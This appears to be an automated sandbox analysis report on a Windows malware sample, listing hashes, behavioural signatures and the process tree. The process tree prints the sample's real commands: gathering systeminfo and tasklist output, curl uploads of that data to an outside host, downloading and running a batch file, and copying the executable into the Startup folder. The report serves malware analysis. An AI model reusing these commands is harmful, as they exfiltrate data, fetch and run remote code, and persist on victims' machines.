Analysis
-
max time kernel
95s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2024 02:28
Static task
static1
Behavioral task
behavioral1
Sample
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe
Resource
win10v2004-20241007-en
General
-
Target
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe
-
Size
898KB
-
MD5
5950611ed70f90b758610609e2aee8e6
-
SHA1
798588341c108850c79da309be33495faf2f3246
-
SHA256
5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
-
SHA512
7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80
-
SSDEEP
12288:UqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgapT1:UqDEvCTbMWu7rQYlBQcBiT6rprG8at1
Malware Config
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe cmd.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 5096 tasklist.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1556 systeminfo.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5096 tasklist.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2032 wrote to memory of 2908 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 83 PID 2032 wrote to memory of 2908 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 83 PID 2032 wrote to memory of 2908 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 83 PID 2908 wrote to memory of 1556 2908 cmd.exe 85 PID 2908 wrote to memory of 1556 2908 cmd.exe 85 PID 2908 wrote to memory of 1556 2908 cmd.exe 85 PID 2908 wrote to memory of 5096 2908 cmd.exe 89 PID 2908 wrote to memory of 5096 2908 cmd.exe 89 PID 2908 wrote to memory of 5096 2908 cmd.exe 89 PID 2032 wrote to memory of 5092 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 90 PID 2032 wrote to memory of 5092 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 90 PID 2032 wrote to memory of 5092 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 90 PID 2032 wrote to memory of 3912 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 93 PID 2032 wrote to memory of 3912 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 93 PID 2032 wrote to memory of 3912 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 93 PID 2032 wrote to memory of 1376 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 96 PID 2032 wrote to memory of 1376 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 96 PID 2032 wrote to memory of 1376 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 96 PID 2032 wrote to memory of 4656 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 97 PID 2032 wrote to memory of 4656 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 97 PID 2032 wrote to memory of 4656 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 97 PID 2032 wrote to memory of 4660 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 101 PID 2032 wrote to memory of 4660 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 101 PID 2032 wrote to memory of 4660 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 101 PID 2032 wrote to memory of 3472 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 103 PID 2032 wrote to memory of 3472 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 103 PID 2032 wrote to memory of 3472 2032 5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe"C:\Users\Admin\AppData\Local\Temp\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:1556
-
-
C:\Windows\SysWOW64\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -X POST -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:3912
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4.exe"2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:1376
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:4656
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt2⤵
- System Location Discovery: System Language Discovery
PID:4660
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C353237306334633638383162376433656261656138663531633431306262613836383961636236376333346632303434303532376135663135663362633165342E657865" -X POST -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"2⤵
- System Location Discovery: System Language Discovery
PID:3472
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
34B
MD5557464a645cbcc72fb20348e1c58dbfd
SHA12a68b1e4c9cca06c959a3174058a27da0faddadd
SHA2562fb99e1172ec47d7d0a943294a483e9c695d774ad9eca0c689eb0e4ad4982c66
SHA512728fba91e931258ed5ad1ff48299193384c0053770e05c0f813e8407dd328454c2c233da52ea67eb5aaf1c523a8d0e5de5a30b9bc94186e62c204b26df23123e
-
Filesize
8KB
MD5a4e3ad9ddbba3be5610a76200d3aaa94
SHA114971f2826075b7e7218efff5b7f7f8c7ee43bf8
SHA256374170da081aa2afd9a6d19ecb38ea0ec63a2b7ab9db892132bbf511ac169c9b
SHA512fafe310f18396a2f332d7d960f9109fec6b05b794b5ea2917af65c22fde33111ff49e73ec70ada06c4e608fbad28984553611ed7d687f87e991850e3b8e74a17